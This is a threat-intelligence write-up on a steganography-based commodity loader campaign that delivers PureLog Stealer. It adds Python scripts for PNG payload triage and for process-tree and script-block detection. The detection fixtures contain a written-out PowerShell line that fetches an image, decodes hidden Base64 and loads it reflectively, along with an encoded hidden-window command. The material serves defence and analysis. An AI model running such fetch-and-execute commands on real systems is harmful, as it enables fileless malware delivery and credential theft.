Cybersecurity researchers have identified a sophisticated malware campaign that exploits a shared commodity loader across multiple threat actor groups. This operation is specifically targeting manufacturing and government organizations in Italy, Finland, and Saudi Arabia, employing precision-engineered attacks designed to pilfer industrial data and compromise sensitive administrative credentials. The campaign highlights advanced tradecraft through diverse infection vectors, including weaponized Office documents, malicious SVG files, and ZIP archives containing LNK shortcuts. Each delivery method ultimately leads to a unified commodity loader, serving as the foundation for deploying Remote Access Trojans and information-stealing malware.
The campaign’s distinctiveness stems from its complex, multi-layered defense evasion techniques. These include steganography, the use of trojanized open-source libraries, and a custom four-stage evasion pipeline meticulously crafted to minimize forensic footprints. The initial infection vector often begins with phishing emails that masquerade as legitimate purchase order communications from trusted business partners, a seemingly simple ruse that conceals the significant technical complexity orchestrated behind the scenes. Cyble analysts were able to map the entire attack workflow and understand its operational mechanics after the malware reached its second stage of execution.
Steganography and Fileless Execution: The Core Attack Mechanism
The infection chain commences with JavaScript files embedded within RAR archives. These files execute heavily obfuscated code, a deliberate measure intended to evade detection systems. The JavaScript then utilizes Windows Management Instrumentation (WMI) to spawn hidden PowerShell processes. To circumvent automated sandbox analysis, these processes employ multiple layers of obfuscation, including Base64 encoding and string manipulation, along with a deliberate five-second sleep delay.
In the subsequent stage, the malware downloads PNG image files from Archive.org. These image files contain steganographically embedded payloads. PowerShell is employed to extract the hidden Base64-encoded .NET assembly using specific delimiters and regular expression pattern matching. This extracted assembly is then loaded reflectively into memory via Reflection.Assembly::Load, a technique that ensures the final payload executes without ever touching the disk. This fileless execution method offers a crucial advantage to threat actors, significantly reducing the probability of detection and complicating forensic investigations.
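The carving step described above is easy to reproduce from the analyst's side. The following Python triage script is an added example (not Cyble's tooling and not the campaign's PowerShell): it walks a PNG's chunk list, looks inside ancillary text chunks and in any bytes appended after the IEND chunk for a delimiter-bounded blob or a long Base64 run, decodes what it finds and checks whether the result carries an MZ header whose e_lfanew points at a PE signature. The `<<BEGIN>>`/`<<END>>` markers, the sample images and the stub "assembly" are all constructed for the example; a real run would use the delimiters recovered from the second-stage script.

```python
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Constructed delimiters; the campaign's real markers are not given in the write-up.
START_MARK = b"<<BEGIN>>"
END_MARK = b"<<END>>"
DELIMITED = re.compile(re.escape(START_MARK) + rb"(.*?)" + re.escape(END_MARK), re.S)
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
TEXT_CHUNKS = (b"tEXt", b"iTXt")  # zTXt would need inflating first; left out here

def _chunk(ctype, payload):
    """Build one PNG chunk: length, type, payload, CRC32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def parse_png(data):
    """Walk the chunk list up to IEND; return (chunks, bytes appended after IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    chunks, pos = [], len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunks.append((ctype, data[pos + 8:pos + 8 + length]))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]

def looks_like_pe(blob):
    """True when blob starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def _decode(text):
    try:
        return base64.b64decode(text, validate=False)  # drops stray CR/LF
    except ValueError:
        return b""

def scan_region(region_name, region):
    """Prefer delimiter-bounded text; fall back to any long Base64 run."""
    how, candidates = "delimited", [m.group(1) for m in DELIMITED.finditer(region)]
    if not candidates:
        how, candidates = "base64-run", [m.group(0) for m in B64_RUN.finditer(region)]
    findings = []
    for text in candidates:
        blob = _decode(text)
        if blob:
            findings.append({"region": region_name, "how": how,
                             "decoded_len": len(blob), "looks_like_pe": looks_like_pe(blob)})
    return findings

def scan_png(data):
    """Triage one PNG: text chunks plus any trailing bytes after IEND."""
    chunks, trailing = parse_png(data)
    findings = []
    for ctype, payload in chunks:
        if ctype in TEXT_CHUNKS:
            findings.extend(scan_region(ctype.decode(), payload))
    if trailing:
        findings.extend(scan_region("after-IEND", trailing))
    return findings

# --- constructed samples (not real campaign artifacts) ---------------------
def _fake_pe():
    """Stand-in for a .NET assembly: MZ stub and PE signature only, no code."""
    hdr = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", hdr, 0x3C, 64)      # e_lfanew -> offset 64
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 220

def _minimal_png():
    """Valid 1x1 8-bit grayscale PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")          # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

CLEAN_PNG = _minimal_png()
HIDDEN = START_MARK + base64.b64encode(_fake_pe()) + END_MARK
# Payload parked in a tEXt chunk ahead of IEND (IEND chunk is the last 12 bytes).
STEGO_TEXT_PNG = CLEAN_PNG[:-12] + _chunk(b"tEXt", b"Comment\x00" + HIDDEN) + _chunk(b"IEND", b"")
# Payload simply appended after IEND, which image viewers ignore.
STEGO_TRAILING_PNG = CLEAN_PNG + HIDDEN

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PNG), ("text-chunk", STEGO_TEXT_PNG), ("trailing", STEGO_TRAILING_PNG)):
        print(label, scan_png(img))
```

The image still renders normally in both stego variants, which is why a pixel-level check is not enough: a triage pass has to look at the container (text chunks and post-IEND bytes), not just the picture. The MZ/PE check is deliberately loose so that a decoded blob with any executable header is surfaced for a human to look at.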
The third stage of the operation involves a trojanized version of the legitimate open-source TaskScheduler library, sourced from GitHub. Threat actors modified the original source code by appending malicious functions before recompiling it. This resulted in an assembly that retains its authentic appearance and functionality while covertly embedding hidden capabilities. The loader then initiates suspended processes using RegAsm.exe, performs process injection, and executes the decoded payload. The ultimate malware delivered is PureLog Stealer, which is extracted using Triple DES decryption in CBC mode with PKCS7 padding, followed by GZip decompression.
The consistent application of steganography, string reversal, Base64 encoding, and process hollowing across various observed campaigns suggests that this commodity loader functions as a shared delivery framework among multiple threat actor groups. This points to a potential commoditization of sophisticated attack infrastructure, indicating that such advanced techniques may become more accessible to a broader range of malicious actors.
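The process-tree and script-block behaviour described across the first and third stages (WMI spawning hidden PowerShell, an image fetched and reflectively loaded, RegAsm.exe started suspended for injection) is what endpoint telemetry can catch regardless of how the loader is obfuscated. The block below is an added example, not Cyble's detection content: three small rules run over constructed Sysmon-style events (process creation and PowerShell script-block records). Every path, command line and URL in the sample events is made up for the demonstration, including the `EXAMPLE-ITEM` Archive.org item name and the encoded-command string.

```python
import ntpath
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Constructed telemetry in a Sysmon-like shape: id 1 = process creation,
# id 4104 = PowerShell script block logging. All values are illustrative.
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "WmiPrvSE.exe"},
    {"id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoACIAZgBvAG8AIgApAA=="},
    {"id": 4104, "script": "Start-Sleep -Seconds 5; "
     "$b=(New-Object Net.WebClient).DownloadString('https://archive.org/download/EXAMPLE-ITEM/pic.png'); "
     "$m=[regex]::Match($b,'<<BEGIN>>(.*?)<<END>>'); "
     "[Reflection.Assembly]::Load([Convert]::FromBase64String($m.Groups[1].Value))"},
    {"id": 1, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "cmdline": "RegAsm.exe"},
    # Benign look-alikes that must not alert.
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"id": 1, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r"RegAsm.exe C:\build\MyLib.dll /codebase"},
    {"id": 4104, "script": "Get-ChildItem C:\\logs | Measure-Object"},
]

def _name(path):
    # ntpath so Windows paths split correctly even when this runs on Linux
    return ntpath.basename(path).lower()

def rule_wmi_hidden_powershell(ev):
    """PowerShell spawned by the WMI provider host with a hidden window or encoded command."""
    if ev["id"] != 1 or _name(ev["parent"]) != "wmiprvse.exe" or _name(ev["image"]) not in POWERSHELL:
        return None
    cl = ev["cmdline"]
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", cl, re.I)
    encoded = re.search(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", cl, re.I)
    return "wmi_spawned_hidden_powershell" if (hidden or encoded) else None

def rule_regasm_without_assembly(ev):
    """RegAsm.exe started by PowerShell with no assembly to register: hollowing candidate."""
    if ev["id"] != 1 or _name(ev["parent"]) not in POWERSHELL or _name(ev["image"]) != "regasm.exe":
        return None
    args = ev["cmdline"].split()[1:]
    if any(a.lower().endswith((".dll", ".exe")) for a in args):
        return None  # legitimate registration names the assembly on the command line
    return "regasm_no_assembly_from_powershell"

def rule_stego_reflective_load(ev):
    """Script block that fetches an image, carves Base64 out of it and loads it in memory."""
    if ev["id"] != 4104:
        return None
    signals = {
        "reflective_load": r"\[(?:System\.)?Reflection\.Assembly\]::Load\b",
        "image_fetch": r"https?://\S+?\.(?:png|jpe?g|gif|bmp)\b",
        "base64_decode": r"FromBase64String",
        "sleep": r"Start-Sleep",
    }
    hits = [k for k, pat in signals.items() if re.search(pat, ev["script"], re.I)]
    if "reflective_load" in hits and len(hits) >= 3:
        return "scriptblock_stego_reflective_load"
    return None

RULES = (rule_wmi_hidden_powershell, rule_regasm_without_assembly, rule_stego_reflective_load)

def detect(events):
    """Return (event_index, rule_name) for every event that trips a rule."""
    alerts = []
    for i, ev in enumerate(events):
        for rule in RULES:
            name = rule(ev)
            if name:
                alerts.append((i, name))
    return alerts

if __name__ == "__main__":
    for idx, name in detect(EVENTS):
        print(f"event {idx}: {name}")
```

The rules key on relationships rather than strings the loader controls: who spawned PowerShell, whether RegAsm.exe was given anything to register, and whether an image download, a Base64 decode and a reflective load appear together in one script block. The benign events show the false-positive boundary: PowerShell launched from Explorer and a RegAsm.exe call that names its DLL both pass. Script-block logging (Event ID 4104) has to be enabled for the third rule to have anything to read.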
The ongoing use of this sophisticated commodity loader in targeted email campaigns raises concerns for organizations in the manufacturing and government sectors, particularly in Italy, Finland, and Saudi Arabia. The campaign’s multi-layered evasion techniques and fileless execution present a formidable challenge for traditional security defenses. Organizations are advised to strengthen their email security protocols, ensure regular patching of software vulnerabilities like CVE-2017-11882, and enhance endpoint detection and response capabilities to counter these evolving threats. Further monitoring by cybersecurity researchers will be crucial to track the development and spread of this shared malware infrastructure and to inform defensive strategies against future attacks.